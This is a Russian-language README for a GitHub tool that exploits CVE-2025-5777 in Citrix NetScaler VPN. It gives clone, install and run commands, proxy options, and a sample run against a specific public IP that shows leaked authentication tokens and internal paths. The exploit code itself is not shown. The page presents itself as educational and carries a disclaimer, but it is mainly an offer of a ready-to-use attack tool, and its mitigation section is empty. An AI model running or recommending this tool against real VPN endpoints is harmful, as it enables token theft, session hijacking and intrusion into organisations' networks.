
Эксплойт-инструмент на основе async для CVE-2025-5777, который обнаруживает и извлекает утекшие токены аутентификации, внутренние IP-адреса и скрытые пути конечных точек из уязвимых конечных точек Citrix NetScaler VPN.
Мощный образовательный инструмент, предназначенный для демонстрации и анализа уязвимости CVE-2025-5777, затрагивающей Citrix NetScaler VPN.
Этот проект является частью инициативы GO-TO CVE.
⚠️ Только для образовательных целей. НЕ ИСПОЛЬЗУЙТЕ это на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
Этот скрипт пытается обнаружить и извлечь чувствительные внутренние токены, внутренние IP-адреса и скрытые пути конечных точек, раскрытые уязвимыми конечными точками Citrix VPN.
Он создан, чтобы помочь студентам, исследователям безопасности и участникам красных команд лучше понять, как обнаруживаются и анализируются реальные CVE.
git clone https://github.com/soltanali0/CVE-2025-5777-Exploit.git
cd CVE-2025-5777-Exploit
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
Требуется Python 3.8+ Опционально: можно использовать виртуальное окружение
python3 exploit.py https://target-vpn.com
--proxy http://127.0.0.1:8080 для маршрутизации через Burp/SOCKS--silent для подавления вывода--output result.json для сохранения в JSONПример:
python3 exploit.py https://20.237.190.100 --output leaks.json

[!] Leak analysis:
→ Tokens found: ZWZlNjViZDA4NThj...
→ Paths found: /nf/auth/doLogoff.do, /nf/auth/doEPA.do, /Credential
и

Чтобы избежать эксплуатации этой CVE:
Этот инструмент выпущен строго для образовательных и законных исследовательских целей. Разработчик не несет ответственности за любое неправомерное использование или незаконную деятельность, осуществляемую с помощью этого кода.
Используя этот инструмент, вы соглашаетесь с тем, что:
Присоединяйтесь к сообществу исследователей утечек CVE и эксплойтов: 👉 https://t.me/GOTOCVE
Разработано Ali Soltani – участником красных команд и охотником за CVE.
Гордый участник GO-TO CVE